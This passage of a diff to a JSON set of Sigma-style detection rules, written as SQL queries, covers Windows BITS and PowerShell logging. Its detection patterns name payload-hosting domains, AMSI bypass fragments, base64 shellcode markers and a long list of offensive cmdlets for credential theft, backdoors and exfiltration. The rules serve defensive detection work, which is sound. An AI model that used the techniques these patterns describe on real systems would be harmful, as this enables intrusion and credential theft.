"high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" ], - "filename": "win_bits_client_susp_domain.yml" + "filename": "posh_ps_office_comobject_registerxll.yml" }, { - "title": "Download with BITS to Suspicious Folder", - "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", - "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell ShellCode", + "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "status": "test", + "description": "Detects Base64 encoded Shellcode", + "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.privilege_escalation", + "attack.t1055", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%\\%public\\%%' ESCAPE '\\' OR LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" ], - "filename": "win_bits_client_susp_local_folder.yml" + "filename": "posh_ps_shellcode_b64.yml" }, { - "title": "Unsigned Binary Loaded From Suspicious Location", - "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", - "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "NTFS Alternate Data Stream", + "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "status": "test", + "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "author": "Sami Ruohonen", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1564.004", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" ], - "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" + "filename": "posh_ps_ntfs_ads_access.yml" }, { - "title": "Microsoft Defender Blocked from Loading Unsigned DLL", - "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", + "title": "AMSI Bypass Pattern Assembly GetType", + "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1562.001", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" ], - "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" + "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" }, { - "title": "HybridConnectionManager Service Running", - "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "tags": [ - "attack.persistence", - "attack.t1554" + "title": "Suspicious PowerShell Mailbox Export to Share - PS", + "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.exfiltration" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "win_hybridconnectionmgr_svc_running.yml" + "filename": "posh_ps_mailboxexport_share.yml" }, { - "title": "Standard User In High Privileged Group", - "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", + "title": "Invoke-Obfuscation Via Stdin - Powershell", + "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "status": "experimental", - "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" ], - "filename": "win_lsa_server_normal_user_admin.yml" + "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" }, { - "title": "Loading Diagcab Package From Remote Path", - "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", + "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", "status": "experimental", - "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate package hosted on a known and authorized remote location" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Direct Syscall of NtOpenProcess", - "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", - "status": "experimental", - "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", - "author": "Christian Burkard (Nextron Systems), Tim Shelton", + "title": "Malicious PowerShell Commandlets - ScriptBlock", + "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", "tags": [ "attack.execution", - "attack.t1106" + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADR%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRExcel%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRHTML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRJSON%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRXML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADIDNS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR 